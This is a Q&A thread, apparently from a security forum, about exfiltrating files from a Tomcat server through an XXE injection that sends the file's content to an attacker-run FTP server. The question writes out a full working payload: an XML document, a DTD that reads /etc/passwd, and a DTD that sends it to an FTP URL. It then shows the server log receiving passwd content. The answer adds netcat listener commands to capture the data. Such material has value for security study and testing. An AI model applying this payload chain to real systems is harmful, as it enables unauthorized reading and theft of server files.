Exfiltration through FTP using XXE on a Tomcat server

Question

I'm trying to extract binary data from a Tomcat server that is using SAXParser. For my FTP server, I am using this source. I'm hosting two DTD's on Github Gist. These are their contents:

Base XML (What gets sent to the server):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data SYSTEM "https://gist.githubusercontent.com/.../a.dtd">
<a>
<b>&send;</b>
</a>

a.dtd (first DTD payload):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "https://gist.githubusercontent.com/.../b.dtd">
%dtd;

b.dtd (final DTD payload):

<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://[my server ip]:2121/%file;'>">
%all;

The reason I am trying to extract /etc/passwd is because I am trying to target a binary file, but when that didn't work, I thought I'd start with something simple. I have confirmed that I have access to /etc/passwd (just retrieved it as an entity originally).

The FTP server works fine and I made sure the port was open. This is the output when the above is executed.

[WEB] Starting webserver on 0.0.0.0:8888...
[FTP] Starting FTP server on 0.0.0.0:2121...
[FTP] x has connected
[FTP] Received:
USER anonymous
[FTP] Received:
PASS Java1.8.0_131@
[FTP] > 230 more data please!
[FTP] Received:
TYPE I
[FTP] > 230 more data please!
[FTP] Received:
CWD root:x:0:0:root:
[FTP] > 230 more data please!
[FTP] Received:
CWD root:
[FTP] > 230 more data please!
[FTP] Received:
CWD bin
[FTP] > 230 more data please!
[FTP] Received:
QUIT
[FTP] > 230 more data please!
[FTP] Received:

... (a lot more blank like above)
[FTP] > 230 more data please!
[FTP] Received:

[FTP] > 230 more data please!
[FTP] Client error: [Errno 32] Broken pipe
[FTP] Connection closed with x

An issue I found while answering Luc's question is an interesting one. Basically, if the data has any slashes, the FTP client interprets it as a folder? Unsure why it stops though. Perhaps I have to write a proper response mechanism so when a CWD command comes through I give it OK or another related response.

Out of curiosity, is there a reason you use two DTD files instead of just one? — Luc, Nov 08 '18 at 15:33
@Luc Yes, I am unable to use entities in the initial payload (internal DTD won't work). — Rob Gates, Nov 08 '18 at 15:34

score 0 · Answer 1 · answered Nov 08 '18 at 15:37

0

I'm not sure what exactly is going on, but it looks like the client (your target) is sending the file's contents to the server as if it contains FTP commands. What if you just listen with netcat? Either just listen with nc -lp 2121 (or whatever your netcat variant wants for arguments, iirc some want nc -l 2121), or maybe the client expects a response in which case you could do something like this:

echo -ne '220 Ok\r\n' | nc -lp 2121

Note that FTP is a text-based protocol. Binary files will be troublesome if the client thinks it has to convert them into ASCII for the control connection. Do try, but it might be that that's your next obstacle.

answered Nov 08 '18 at 15:37

Luc

31,973
8
71
135

Will be difficult because first I need to reply asking for password then need to spam need more data for everything sent. Might be able to just type it back to the target. Will try later, but I don't understand why doesn't a non-binary file work. /etc/passwd is just text. – Rob Gates Nov 08 '18 at 15:56
@RobGates Perhaps `nc -lp 2121 | tee output` can show you both the output live, so that you can type back, as well as save it into a file? After it uploaded the binary, you can then strip off the FTP commands from the beginning of the file. – Luc Nov 08 '18 at 16:02
while testing I figured an issue (why CWD) out. Basically, /etc/passwd has slashes in it (such as "/root:/bin/bash") and this is coming out to be "ftp://server:2121/root:x:0:0:root:/root:/bin/bash" which is why it is trying to do CWD root and CWD bin. Not sure how to prevent this. – Rob Gates Nov 08 '18 at 16:33
Even when I reply to the CWD commands with 250 (tried 200 too) Okay, the server quits and outputs the error "java.io.IOException: sun.net.ftp.FtpProtocolException: Illegal FTP command". – Rob Gates Nov 08 '18 at 16:42
@RobGates Ah, too bad. I'm sorry, I don't know enough about this specific server to help you effectively without going back and forth 20 times. I'd say, ask a friend to help and have a look, but I remember a few years ago I was studying software development and the only person in school, as well as among friends and family, who was into the security side of things. I didn't have someone to ask when I couldn't figure something out. Just in case you're in a similar situation, feel free to reach out -- contact info is in my profile (though note that I don't read Twitter regularly). – Luc Nov 08 '18 at 18:54

Exfiltration through FTP using XXE on a Tomcat server

1 Answers1